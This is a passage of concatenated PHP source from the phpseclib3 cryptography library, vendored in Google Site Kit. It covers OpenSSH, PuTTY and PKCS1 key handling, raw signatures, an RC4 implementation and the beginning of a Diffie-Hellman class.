throw new \UnexpectedValueException('Key appears to be malformed'); } $publicKey = $key; return \compact('type', 'publicKey', 'comment'); } /** * Toggle between binary and printable keys * * Printable keys are what are generated by default. These are the ones that go in * $HOME/.ssh/authorized_key. * * @param bool $enabled */ public static function setBinaryOutput($enabled) { self::$binary = $enabled; } /** * Checks to see if the type is valid * * @param string $candidate */ private static function checkType($candidate) { if (!\in_array($candidate, static::$types)) { throw new \RuntimeException("The key type ({$candidate}) is not equal to: " . \implode(',', static::$types)); } } /** * Wrap a private key appropriately * * @param string $publicKey * @param string $privateKey * @param string $password * @param array $options * @return string */ protected static function wrapPrivateKey($publicKey, $privateKey, $password, $options) { list(, $checkint) = \unpack('N', \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(4)); $comment = isset($options['comment']) ? $options['comment'] : self::$comment; $paddedKey = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('NN', $checkint, $checkint) . $privateKey . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $comment); $usesEncryption = !empty($password) && \is_string($password); /* from http://tools.ietf.org/html/rfc4253#section-6 : Note that the length of the concatenation of 'packet_length', 'padding_length', 'payload', and 'random padding' MUST be a multiple of the cipher block size or 8, whichever is larger. */ $blockSize = $usesEncryption ? 16 : 8; $paddingLength = ($blockSize - 1) * \strlen($paddedKey) % $blockSize; for ($i = 1; $i <= $paddingLength; $i++) { $paddedKey .= \chr($i); } if (!$usesEncryption) { $key = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sssNss', 'none', 'none', '', 1, $publicKey, $paddedKey); } else { $rounds = isset($options['rounds']) ? $options['rounds'] : 16; $salt = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(16); $kdfoptions = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sN', $salt, $rounds); $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES('ctr'); $crypto->setPassword($password, 'bcrypt', $salt, $rounds, 32); $paddedKey = $crypto->encrypt($paddedKey); $key = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sssNss', 'aes256-ctr', 'bcrypt', $kdfoptions, 1, $publicKey, $paddedKey); } $key = "openssh-key-v1\x00{$key}"; return "-----BEGIN OPENSSH PRIVATE KEY-----\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key), 70, "\n") . "-----END OPENSSH PRIVATE KEY-----\n"; } } <?php /** * PuTTY Formatted Key Handler * * See PuTTY's SSHPUBK.C and https://tartarus.org/~simon/putty-snapshots/htmldoc/AppendixC.html * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; /** * PuTTY Formatted Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PuTTY { /** * Default comment * * @var string */ private static $comment = 'phpseclib-generated-key'; /** * Default version * * @var int */ private static $version = 2; /** * Sets the default comment * * @param string $comment */ public static function setComment($comment) { self::$comment = \str_replace(["\r", "\n"], '', $comment); } /** * Sets the default version * * @param int $version */ public static function setVersion($version) { if ($version != 2 && $version != 3) { throw new \RuntimeException('Only supported versions are 2 and 3'); } self::$version = $version; } /** * Generate a symmetric key for PuTTY v2 keys * * @param string $password * @param int $length * @return string */ private static function generateV2Key($password, $length) { $symkey = ''; $sequence = 0; while (\strlen($symkey) < $length) { $temp = \pack('Na*', $sequence++, $password); $symkey .= \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::hex2bin(\sha1($temp)); } return \substr($symkey, 0, $length); } /** * Generate a symmetric key for PuTTY v3 keys * * @param string $password * @param string $flavour * @param int $memory * @param int $passes * @param string $salt * @return array */ private static function generateV3Key($password, $flavour, $memory, $passes, $salt) { if (!\function_exists('sodium_crypto_pwhash')) { throw new \RuntimeException('sodium_crypto_pwhash needs to exist for Argon2 password hasing'); } switch ($flavour) { case 'Argon2i': $flavour = \SODIUM_CRYPTO_PWHASH_ALG_ARGON2I13; break; case 'Argon2id': $flavour = \SODIUM_CRYPTO_PWHASH_ALG_ARGON2ID13; break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Only Argon2i and Argon2id are supported'); } $length = 80; // keylen + ivlen + mac_keylen $temp = \sodium_crypto_pwhash($length, $password, $salt, $passes, $memory << 10, $flavour); $symkey = \substr($temp, 0, 32); $symiv = \substr($temp, 32, 16); $hashkey = \substr($temp, -32); return \compact('symkey', 'symiv', 'hashkey'); } /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password * @return array */ public static function load($key, $password) { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } if (\strpos($key, 'BEGIN SSH2 PUBLIC KEY') !== \false) { $lines = \preg_split('#[\\r\\n]+#', $key); switch (\true) { case $lines[0] != '---- BEGIN SSH2 PUBLIC KEY ----': throw new \UnexpectedValueException('Key doesn\'t start with ---- BEGIN SSH2 PUBLIC KEY ----'); case $lines[\count($lines) - 1] != '---- END SSH2 PUBLIC KEY ----': throw new \UnexpectedValueException('Key doesn\'t end with ---- END SSH2 PUBLIC KEY ----'); } $lines = \array_splice($lines, 1, -1); $lines = \array_map(function ($line) { return \rtrim($line, "\r\n"); }, $lines); $data = $current = ''; $values = []; $in_value = \false; foreach ($lines as $line) { switch (\true) { case \preg_match('#^(.*?): (.*)#', $line, $match): $in_value = $line[\strlen($line) - 1] == '\\'; $current = \strtolower($match[1]); $values[$current] = $in_value ? \substr($match[2], 0, -1) : $match[2]; break; case $in_value: $in_value = $line[\strlen($line) - 1] == '\\'; $values[$current] .= $in_value ? \substr($line, 0, -1) : $line; break; default: $data .= $line; } } $components = \call_user_func([static::PUBLIC_HANDLER, 'load'], $data); if ($components === \false) { throw new \UnexpectedValueException('Unable to decode public key'); } $components += $values; $components['comment'] = \str_replace(['\\\\', '\\"'], ['\\', '"'], $values['comment']); return $components; } $components = []; $key = \preg_split('#\\r\\n|\\r|\\n#', \trim($key)); if (\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key[0], \strlen('PuTTY-User-Key-File-')) != 'PuTTY-User-Key-File-') { return \false; } $version = (int) \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($key[0], 3); // should be either "2: " or "3: 0" prior to int casting if ($version != 2 && $version != 3) { throw new \RuntimeException('Only v2 and v3 PuTTY private keys are supported'); } $components['type'] = $type = \rtrim($key[0]); if (!\in_array($type, static::$types)) { $error = \count(static::$types) == 1 ? 'Only ' . static::$types[0] . ' keys are supported. ' : ''; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException($error . 'This is an unsupported ' . $type . ' key'); } $encryption = \trim(\preg_replace('#Encryption: (.+)#', '$1', $key[1])); $components['comment'] = \trim(\preg_replace('#Comment: (.+)#', '$1', $key[2])); $publicLength = \trim(\preg_replace('#Public-Lines: (\\d+)#', '$1', $key[3])); $public = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode(\implode('', \array_map('trim', \array_slice($key, 4, $publicLength)))); $source = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ssss', $type, $encryption, $components['comment'], $public); \extract(\unpack('Nlength', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($public, 4))); $newtype = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($public, $length); if ($newtype != $type) { throw new \RuntimeException('The binary type does not match the human readable type field'); } $components['public'] = $public; switch ($version) { case 3: $hashkey = ''; break; case 2: $hashkey = 'putty-private-key-file-mac-key'; } $offset = $publicLength + 4; switch ($encryption) { case 'aes256-cbc': $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES('cbc'); switch ($version) { case 3: $flavour = \trim(\preg_replace('#Key-Derivation: (.*)#', '$1', $key[$offset++])); $memory = \trim(\preg_replace('#Argon2-Memory: (\\d+)#', '$1', $key[$offset++])); $passes = \trim(\preg_replace('#Argon2-Passes: (\\d+)#', '$1', $key[$offset++])); $parallelism = \trim(\preg_replace('#Argon2-Parallelism: (\\d+)#', '$1', $key[$offset++])); $salt = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::hex2bin(\trim(\preg_replace('#Argon2-Salt: ([0-9a-f]+)#', '$1', $key[$offset++]))); \extract(self::generateV3Key($password, $flavour, $memory, $passes, $salt)); break; case 2: $symkey = self::generateV2Key($password, 32); $symiv = \str_repeat("\x00", $crypto->getBlockLength() >> 3); $hashkey .= $password; } } switch ($version) { case 3: $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha256'); $hash->setKey($hashkey); break; case 2: $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha1'); $hash->setKey(\sha1($hashkey, \true)); } $privateLength = \trim(\preg_replace('#Private-Lines: (\\d+)#', '$1', $key[$offset++])); $private = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode(\implode('', \array_map('trim', \array_slice($key, $offset, $privateLength)))); if ($encryption != 'none') { $crypto->setKey($symkey); $crypto->setIV($symiv); $crypto->disablePadding(); $private = $crypto->decrypt($private); } $source .= \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $private); $hmac = \trim(\preg_replace('#Private-MAC: (.+)#', '$1', $key[$offset + $privateLength])); $hmac = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::hex2bin($hmac); if (!\hash_equals($hash->hash($source), $hmac)) { throw new \UnexpectedValueException('MAC validation error'); } $components['private'] = $private; return $components; } /** * Wrap a private key appropriately * * @param string $public * @param string $private * @param string $type * @param string $password * @param array $options optional * @return string */ protected static function wrapPrivateKey($public, $private, $type, $password, array $options = []) { $encryption = !empty($password) || \is_string($password) ? 'aes256-cbc' : 'none'; $comment = isset($options['comment']) ? $options['comment'] : self::$comment; $version = isset($options['version']) ? $options['version'] : self::$version; $key = "PuTTY-User-Key-File-{$version}: {$type}\r\n"; $key .= "Encryption: {$encryption}\r\n"; $key .= "Comment: {$comment}\r\n"; $public = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $type) . $public; $source = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ssss', $type, $encryption, $comment, $public); $public = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($public); $key .= "Public-Lines: " . (\strlen($public) + 63 >> 6) . "\r\n"; $key .= \chunk_split($public, 64); if (empty($password) && !\is_string($password)) { $source .= \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $private); switch ($version) { case 3: $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha256'); $hash->setKey(''); break; case 2: $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha1'); $hash->setKey(\sha1('putty-private-key-file-mac-key', \true)); } } else { $private .= \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(16 - (\strlen($private) & 15)); $source .= \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $private); $crypto = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES('cbc'); switch ($version) { case 3: $salt = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(16); $key .= "Key-Derivation: Argon2id\r\n"; $key .= "Argon2-Memory: 8192\r\n"; $key .= "Argon2-Passes: 13\r\n"; $key .= "Argon2-Parallelism: 1\r\n"; $key .= "Argon2-Salt: " . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($salt) . "\r\n"; \extract(self::generateV3Key($password, 'Argon2id', 8192, 13, $salt)); $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha256'); $hash->setKey($hashkey); break; case 2: $symkey = self::generateV2Key($password, 32); $symiv = \str_repeat("\x00", $crypto->getBlockLength() >> 3); $hashkey = 'putty-private-key-file-mac-key' . $password; $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha1'); $hash->setKey(\sha1($hashkey, \true)); } $crypto->setKey($symkey); $crypto->setIV($symiv); $crypto->disablePadding(); $private = $crypto->encrypt($private); $mac = $hash->hash($source); } $private = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($private); $key .= 'Private-Lines: ' . (\strlen($private) + 63 >> 6) . "\r\n"; $key .= \chunk_split($private, 64); $key .= 'Private-MAC: ' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($hash->hash($source)) . "\r\n"; return $key; } /** * Wrap a public key appropriately * * This is basically the format described in RFC 4716 (https://tools.ietf.org/html/rfc4716) * * @param string $key * @param string $type * @return string */ protected static function wrapPublicKey($key, $type) { $key = \pack('Na*a*', \strlen($type), $type, $key); $key = "---- BEGIN SSH2 PUBLIC KEY ----\r\n" . 'Comment: "' . \str_replace(['\\', '"'], ['\\\\', '\\"'], self::$comment) . "\"\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key), 64) . '---- END SSH2 PUBLIC KEY ----'; return $key; } } <?php /** * PKCS1 Formatted Key Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; /** * PKCS1 Formatted Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS { /** * Default encryption algorithm * * @var string */ private static $defaultEncryptionAlgorithm = 'AES-128-CBC'; /** * Sets the default encryption algorithm * * @param string $algo */ public static function setEncryptionAlgorithm($algo) { self::$defaultEncryptionAlgorithm = $algo; } /** * Returns the mode constant corresponding to the mode string * * @param string $mode * @return int * @throws \UnexpectedValueException if the block cipher mode is unsupported */ private static function getEncryptionMode($mode) { switch ($mode) { case 'CBC': case 'ECB': case 'CFB': case 'OFB': case 'CTR': return $mode; } throw new \UnexpectedValueException('Unsupported block cipher mode of operation'); } /** * Returns a cipher object corresponding to a string * * @param string $algo * @return string * @throws \UnexpectedValueException if the encryption algorithm is unsupported */ private static function getEncryptionObject($algo) { $modes = '(CBC|ECB|CFB|OFB|CTR)'; switch (\true) { case \preg_match("#^AES-(128|192|256)-{$modes}\$#", $algo, $matches): $cipher = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\AES(self::getEncryptionMode($matches[2])); $cipher->setKeyLength($matches[1]); return $cipher; case \preg_match("#^DES-EDE3-{$modes}\$#", $algo, $matches): return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES(self::getEncryptionMode($matches[1])); case \preg_match("#^DES-{$modes}\$#", $algo, $matches): return new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DES(self::getEncryptionMode($matches[1])); default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException($algo . ' is not a supported algorithm'); } } /** * Generate a symmetric key for PKCS#1 keys * * @param string $password * @param string $iv * @param int $length * @return string */ private static function generateSymmetricKey($password, $iv, $length) { $symkey = ''; $iv = \substr($iv, 0, 8); while (\strlen($symkey) < $length) { $symkey .= \md5($symkey . $password . $iv, \true); } return \substr($symkey, 0, $length); } /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ protected static function load($key, $password) { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } /* Although PKCS#1 proposes a format that public and private keys can use, encrypting them is "outside the scope" of PKCS#1. PKCS#1 then refers you to PKCS#12 and PKCS#15 if you're wanting to protect private keys, however, that's not what OpenSSL* does. OpenSSL protects private keys by adding two new "fields" to the key - DEK-Info and Proc-Type. These fields are discussed here: http://tools.ietf.org/html/rfc1421#section-4.6.1.1 http://tools.ietf.org/html/rfc1421#section-4.6.1.3 DES-EDE3-CBC as an algorithm, however, is not discussed anywhere, near as I can tell. DES-CBC and DES-EDE are discussed in RFC1423, however, DES-EDE3-CBC isn't, nor is its key derivation function. As is, the definitive authority on this encoding scheme isn't the IETF but rather OpenSSL's own implementation. ie. the implementation *is* the standard and any bugs that may exist in that implementation are part of the standard, as well. * OpenSSL is the de facto standard. It's utilized by OpenSSH and other projects */ if (\preg_match('#DEK-Info: (.+),(.+)#', $key, $matches)) { $iv = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::hex2bin(\trim($matches[2])); // remove the Proc-Type / DEK-Info sections as they're no longer needed $key = \preg_replace('#^(?:Proc-Type|DEK-Info): .*#m', '', $key); $ciphertext = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($key); if ($ciphertext === \false) { $ciphertext = $key; } $crypto = self::getEncryptionObject($matches[1]); $crypto->setKey(self::generateSymmetricKey($password, $iv, $crypto->getKeyLength() >> 3)); $crypto->setIV($iv); $key = $crypto->decrypt($ciphertext); } else { if (self::$format != self::MODE_DER) { $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($key); if ($decoded !== \false) { $key = $decoded; } elseif (self::$format == self::MODE_PEM) { throw new \UnexpectedValueException('Expected base64-encoded PEM format but was unable to decode base64 text'); } } } return $key; } /** * Wrap a private key appropriately * * @param string $key * @param string $type * @param string $password * @param array $options optional * @return string */ protected static function wrapPrivateKey($key, $type, $password, array $options = []) { if (empty($password) || !\is_string($password)) { return "-----BEGIN {$type} PRIVATE KEY-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key), 64) . "-----END {$type} PRIVATE KEY-----"; } $encryptionAlgorithm = isset($options['encryptionAlgorithm']) ? $options['encryptionAlgorithm'] : self::$defaultEncryptionAlgorithm; $cipher = self::getEncryptionObject($encryptionAlgorithm); $iv = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string($cipher->getBlockLength() >> 3); $cipher->setKey(self::generateSymmetricKey($password, $iv, $cipher->getKeyLength() >> 3)); $cipher->setIV($iv); $iv = \strtoupper(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($iv)); return "-----BEGIN {$type} PRIVATE KEY-----\r\n" . "Proc-Type: 4,ENCRYPTED\r\n" . "DEK-Info: " . $encryptionAlgorithm . ",{$iv}\r\n" . "\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($cipher->encrypt($key)), 64) . "-----END {$type} PRIVATE KEY-----"; } /** * Wrap a public key appropriately * * @param string $key * @param string $type * @return string */ protected static function wrapPublicKey($key, $type) { return "-----BEGIN {$type} PUBLIC KEY-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key), 64) . "-----END {$type} PUBLIC KEY-----"; } } <?php /** * Raw Signature Handler * * PHP version 5 * * Handles signatures as arrays * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Signature; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Raw Signature Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Raw { /** * Loads a signature * * @param array $sig * @return array|bool */ public static function load($sig) { switch (\true) { case !\is_array($sig): case !isset($sig['r']) || !isset($sig['s']): case !$sig['r'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: case !$sig['s'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: return \false; } return ['r' => $sig['r'], 's' => $sig['s']]; } /** * Returns a signature in the appropriate format * * @param BigInteger $r * @param BigInteger $s * @return string */ public static function save(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $r, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $s) { return \compact('r', 's'); } } <?php /** * Pure-PHP implementation of RC4. * * Uses mcrypt, if available, and an internal implementation, otherwise. * * PHP version 5 * * Useful resources are as follows: * * - {@link http://www.mozilla.org/projects/security/pki/nss/draft-kaukonen-cipher-arcfour-03.txt ARCFOUR Algorithm} * - {@link http://en.wikipedia.org/wiki/RC4 - Wikipedia: RC4} * * RC4 is also known as ARCFOUR or ARC4. The reason is elaborated upon at Wikipedia. This class is named RC4 and not * ARCFOUR or ARC4 because RC4 is how it is referred to in the SSH1 specification. * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $rc4 = new \phpseclib3\Crypt\RC4(); * * $rc4->setKey('abcdefgh'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $rc4->decrypt($rc4->encrypt($plaintext)); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\StreamCipher; /** * Pure-PHP implementation of RC4. * * @author Jim Wigginton <terrafrost@php.net> */ class RC4 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\StreamCipher { /** * @see \phpseclib3\Crypt\RC4::_crypt() */ const ENCRYPT = 0; /** * @see \phpseclib3\Crypt\RC4::_crypt() */ const DECRYPT = 1; /** * Key Length (in bytes) * * @see \phpseclib3\Crypt\RC4::setKeyLength() * @var int */ protected $key_length = 128; // = 1024 bits /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'arcfour'; /** * The Key * * @see self::setKey() * @var string */ protected $key; /** * The Key Stream for decryption and encryption * * @see self::setKey() * @var array */ private $stream; /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { if ($engine == self::ENGINE_OPENSSL) { if ($this->continuousBuffer) { return \false; } // quoting https://www.openssl.org/news/openssl-3.0-notes.html, OpenSSL 3.0.1 // "Moved all variations of the EVP ciphers CAST5, BF, IDEA, SEED, RC2, RC4, RC5, and DES to the legacy provider" // in theory openssl_get_cipher_methods() should catch this but, on GitHub Actions, at least, it does not if (\defined('OPENSSL_VERSION_TEXT') && \version_compare(\preg_replace('#OpenSSL (\\d+\\.\\d+\\.\\d+) .*#', '$1', \OPENSSL_VERSION_TEXT), '3.0.1', '>=')) { return \false; } $this->cipher_name_openssl = 'rc4-40'; } return parent::isValidEngineHelper($engine); } /** * Sets the key length * * Keys can be between 1 and 256 bytes long. * * @param int $length * @throws \LengthException if the key length is invalid */ public function setKeyLength($length) { if ($length < 8 || $length > 2048) { throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys between 1 and 256 bytes are supported'); } $this->key_length = $length >> 3; parent::setKeyLength($length); } /** * Sets the key length * * Keys can be between 1 and 256 bytes long. * * @param string $key */ public function setKey($key) { $length = \strlen($key); if ($length < 1 || $length > 256) { throw new \LengthException('Key size of ' . $length . ' bytes is not supported by RC4. Keys must be between 1 and 256 bytes long'); } parent::setKey($key); } /** * Encrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @see self::crypt() * @param string $plaintext * @return string $ciphertext */ public function encrypt($plaintext) { if ($this->engine != self::ENGINE_INTERNAL) { return parent::encrypt($plaintext); } return $this->crypt($plaintext, self::ENCRYPT); } /** * Decrypts a message. * * $this->decrypt($this->encrypt($plaintext)) == $this->encrypt($this->encrypt($plaintext)). * At least if the continuous buffer is disabled. * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see self::crypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { if ($this->engine != self::ENGINE_INTERNAL) { return parent::decrypt($ciphertext); } return $this->crypt($ciphertext, self::DECRYPT); } /** * Encrypts a block * * @param string $in */ protected function encryptBlock($in) { // RC4 does not utilize this method } /** * Decrypts a block * * @param string $in */ protected function decryptBlock($in) { // RC4 does not utilize this method } /** * Setup the key (expansion) * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupKey() */ protected function setupKey() { $key = $this->key; $keyLength = \strlen($key); $keyStream = \range(0, 255); $j = 0; for ($i = 0; $i < 256; $i++) { $j = $j + $keyStream[$i] + \ord($key[$i % $keyLength]) & 255; $temp = $keyStream[$i]; $keyStream[$i] = $keyStream[$j]; $keyStream[$j] = $temp; } $this->stream = []; $this->stream[self::DECRYPT] = $this->stream[self::ENCRYPT] = [ 0, // index $i 0, // index $j $keyStream, ]; } /** * Encrypts or decrypts a message. * * @see self::encrypt() * @see self::decrypt() * @param string $text * @param int $mode * @return string $text */ private function crypt($text, $mode) { if ($this->changed) { $this->setup(); } $stream =& $this->stream[$mode]; if ($this->continuousBuffer) { $i =& $stream[0]; $j =& $stream[1]; $keyStream =& $stream[2]; } else { $i = $stream[0]; $j = $stream[1]; $keyStream = $stream[2]; } $len = \strlen($text); for ($k = 0; $k < $len; ++$k) { $i = $i + 1 & 255; $ksi = $keyStream[$i]; $j = $j + $ksi & 255; $ksj = $keyStream[$j]; $keyStream[$i] = $ksj; $keyStream[$j] = $ksi; $text[$k] = $text[$k] ^ \chr($keyStream[$ksj + $ksi & 255]); } return $text; } } <?php /** * Pure-PHP (EC)DH implementation * * PHP version 5 * * Here's an example of how to compute a shared secret with this library: * <code> * <?php * include 'vendor/autoload.php'; * * $ourPrivate = \phpseclib3\Crypt\DH::createKey(); * $secret = DH::computeSecret($ourPrivate, $theirPublic); * * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\Parameters; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\PrivateKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\PublicKey; use Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Pure-PHP (EC)DH implementation * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DH extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey { /** * Algorithm Name * * @var string */ const ALGORITHM = 'DH'; /** * DH prime * * @var BigInteger */ protected $prime; /** * DH Base * * Prime divisor of p-1 * * @var BigInteger */ protected $base; /** * Public Key * * @var BigInteger */ protected $publicKey; /** * Create DH parameters * * This method is a bit polymorphic. It can take any of the following: * - two BigInteger's (prime and base) * - an integer representing the size of the prime in bits (the base is assumed to be 2) * - a string (eg. diffie-hellman-group14-sha1) * * @return Parameters */ public static function createParameters(...$args) { $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createParameters() should not be called from final classes (' . static::class . ')'); } $params = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\Parameters(); if (\count($args) == 2 && $args[0] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger && $args[1] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger) { //if (!$args[0]->isPrime()) { // throw new \InvalidArgumentException('The first parameter should be a prime number'); //} $params->prime = $args[0]; $params->base = $args[1]; return $params; } elseif (\count($args) == 1 && \is_numeric($args[0])) { $params->prime = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomPrime($args[0]); $params->base = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(2); return $params; } elseif (\count($args) != 1 || !\is_string($args[0])) { throw new \InvalidArgumentException('Valid parameters are either: two BigInteger\'s (prime and base), a single integer (the length of the prime; base is assumed to be 2) or a string'); } switch ($args[0]) { // see http://tools.ietf.org/html/rfc2409#section-6.2 and // 